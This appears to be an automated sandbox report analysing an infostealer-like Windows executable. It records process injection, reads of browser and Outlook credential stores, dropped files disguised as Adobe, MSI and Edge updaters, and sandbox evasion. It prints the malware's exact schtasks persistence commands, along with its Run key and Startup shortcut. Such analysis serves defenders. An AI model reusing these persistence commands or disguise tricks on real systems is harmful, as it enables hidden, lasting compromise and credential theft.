Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\system32\be48b7e085f82db6cf0b1ec635202c1c4f4f538484da64a27afabc6ff559817fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vNnwTwjWIvfBLogin Data.3.dr, KqbMb6uMMrllLogin Data For Account.3.dr, AUbJyYTe1V8SLogin Data.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BitLockerToGo.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: file.exe String found in binary or memory: net/addrselect.go
Source: file.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe "C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d3d11.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dxgi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d3d10warp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dxcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: devobj.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vaultcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntmarta.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windowscodecs.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: propsys.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: linkinfo.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntshrui.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cscapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: edputil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: appresolver.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: bcp47langs.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: slc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sppc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: apphelp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll
Source: EdgeMS2.lnk.3.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static file information: File size 12249088 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x49e000
Source: file.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x698e00
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 9.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Unpacked PE file: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 15.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 20.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 22.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 23.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
Source: file.exe Static PE information: section name: .xdata
Source: l2[1].exe.3.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.3.dr Static PE information: section name: .MPRESS2
Source: KSExO5GhJ2KIj6jiDKtz.exe.3.dr Static PE information: section name: .MPRESS1
Source: KSExO5GhJ2KIj6jiDKtz.exe.3.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.3.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.3.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.3.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F262E1 push esp; ret 3_2_02F262E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44062 push ss; ret 3_2_02F44064
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F40482 push ss; ret 3_2_02F40484
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E2CFDB push cs; iretd 3_2_02E2D025
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E33F59 push ecx; ret 3_2_02E33F6C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe

Boot Survival

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEE170 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_02EEE170
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EBC230 CreateThread,Sleep, call eax 3_2_07EBC230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos, 3_2_02E5DB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 451
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 533
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 8293
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995
